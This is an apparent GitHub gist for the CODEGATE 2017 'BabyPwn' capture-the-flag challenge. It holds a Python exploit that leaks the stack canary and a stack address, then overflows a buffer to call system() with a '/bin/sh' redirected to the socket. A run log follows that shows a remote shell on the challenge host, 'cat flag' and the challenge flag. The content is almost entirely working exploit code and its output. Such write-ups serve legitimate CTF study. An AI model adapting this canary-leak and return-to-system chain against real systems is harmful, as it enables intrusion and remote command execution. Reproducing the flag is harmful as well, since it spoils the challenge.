Last active
February 12, 2017 21:43
-
-
Save tsunpoko/60eb60120f51aa72c82169c88c9283a6 to your computer and use it in GitHub Desktop.
CODEGATE2017 prequals - BabyPwn
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from No___Op import * | |
| if len(sys.argv) > 1: | |
| target = '110.10.212.130:8889' | |
| else: | |
| target = 'localhost:8181' | |
| c = Pwning( target ) | |
| plt_system = 0x08048620 #+ 0x10 | |
| c.sendall('1') | |
| time.sleep(1) | |
| c.sendall('a' * 0x28) | |
| c.read_until('a' * 28 + '\n') | |
| canary = u32('\x00' + c.recv(3)) | |
| succ('canary: ' + hex(canary)) | |
| c.sendall('1') | |
| time.sleep(1) | |
| c.sendall('a' * (0x28 + 4 + 4 + 3)) | |
| c.read_until('a' * (0x28 + 4 + 4 + 3) + '\n') | |
| addr_stack = u32(c.recv(4)) - 0x174 # buffer | |
| succ('stack_addr: ' + hex(addr_stack)) | |
| payload = '' | |
| payload += 'a' * (40 - len(payload)) | |
| payload += p32(canary) | |
| payload += 'a' * 12 | |
| payload += p32(plt_system) | |
| payload += 'gomi' | |
| payload += p32(addr_stack + len(payload) + 4) | |
| payload += '/bin/sh <&4 >&4 2>&4;' | |
| payload += 'c' * (0x64 - len(payload)) | |
| c.sendall('1') | |
| time.sleep(0.5) | |
| c.sendall(payload) | |
| time.sleep(0.5) | |
| c.sendall('3') | |
| c.shell() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $ python exp.py r | |
| [*]Connecting "110.10.212.130:8889"... | |
| [+]Connection success! | |
| [+]canary: 0xcc781900 | |
| [+]stack_addr: 0xffca6f34 | |
| *** 4ll y0u n33d i5 5HELL! *** | |
| Time Out! | |
| ls | |
| babypwn | |
| flag | |
| cat flag | |
| FLAG{Good_Job~!Y0u_@re_Very__G@@d!!!!!!^.^} | |
| exit | |
| *** Connection closed by remote host *** |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment